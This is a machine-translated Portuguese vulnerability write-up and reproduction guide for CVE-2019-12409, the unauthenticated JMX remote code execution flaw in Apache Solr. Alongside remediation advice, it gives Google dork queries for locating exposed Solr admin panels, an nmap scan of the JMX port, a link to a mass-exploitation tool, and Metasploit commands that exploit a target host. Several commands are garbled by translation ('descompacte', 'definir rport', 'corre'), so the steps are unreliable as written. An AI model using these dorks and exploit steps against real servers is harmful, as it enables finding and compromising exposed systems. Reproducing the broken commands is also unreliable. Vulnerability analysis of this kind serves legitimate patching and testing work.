CVE-2019-12409-Execução remota de código do serviço Apache Solr JMX

Análise de vulnerabilidade

https://www.freebuf.com/vuls/218730.html

Introdução à vulnerabilidade

A vulnerabilidade decorre do risco de segurança da opção de configuração ENABLE_REMOTE_JMX_OPTS no arquivo de configuração padrão solr.in.sh. A versão 8.1.1 e 8.2.0 do ApacheSolr vem com a opção ENABLE_REMOTE_JMX_OPTS = "true" no arquivo de configuração solr.in.sh. Se o arquivo solr.in.sh padrão na versão afetada for usado, o monitoramento JMX será ativado e exposto em RMI_PORT (padrão = 18983 ) e nenhuma autenticação será necessária. Se essa porta for aberta pelo tráfego de entrada no firewall, qualquer pessoa com acesso à rede no nó Solr poderá acessar o JMX e poderá fazer upload de código malicioso para execução no servidor Solr. A vulnerabilidade não afeta os usuários dos sistemas Windows, afeta apenas os usuários de algumas versões do Linux.

Versão afetada

Apache Solr 8.1.1

Apache Solr 8.2.0 versão

A versão do Apache Solr 7.7.2 também pode ser executada por comando

 

Pré-requisitos

1. A configuração padrão abrirá o serviço JMX na porta padrão 18983 e a autenticação não está ativada por padrão.

2. Atenda aos requisitos de versão

3. usuários do Linux

 

Método de reparo

1. Verifique se o cluster Solr pode ser acessado apenas por terminais confiáveis;

2. Habilite a autenticação do serviço Solr JMX;

3. Feche o serviço Solr JMX.

 

Gramática do Google

intitle: "Solr Admin" "Sintaxe de consulta do Solr"

intitle: "Solr Admin"  "Core Admin"  "Despejo de Thread"

 

Endereço de download da versão completa

http://archive.apache.org/dist/lucene/solr/

Construção e reprodução ambiental

https://mp.weixin.qq.com/s/rtdMC6zVxC6XXlIqggcwYA

Crie ambiente para baixar e instalar o Apache Solr 8.20

wget http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

descompacte solr-8.2.0.zip # unzip

cd / bin

./solr start -force # Inicie o serviço Solr. Se a memória do serviço for insuficiente, um erro será relatado e a porta 8983 não será monitorada. Você pode tentar este comando

./solr start -e cloud -force (A imagem mostra o gráfico de erros)

 

 

Use o nmap para varrer a porta e confirme se a porta 18983 está aberta

nmap -p 18983 -Pn -T5 -n -sC -sV 10.10.20.166 -sC -sV

 

 

Verificação em massa

https://mp.weixin.qq.com/s/yP4SE6WC-SnA-bJW0FGWDg

Ferramentas usadas no artigo

https://github.com/k8gege/SolrExp

 

Use msf para usar o módulo

https://www.cnblogs.com/dddjh/p/11896624.html

use o módulo exploit / multi / misc / java_jmx_server #select

set rhost 192.168.2.128 #set target ip

definir rport 18983 #Set port

corre

 

 Retornar com sucesso

 

Acho que você gosta

Origin www.cnblogs.com/null1433/p/12723729.html
Recomendado
Clasificación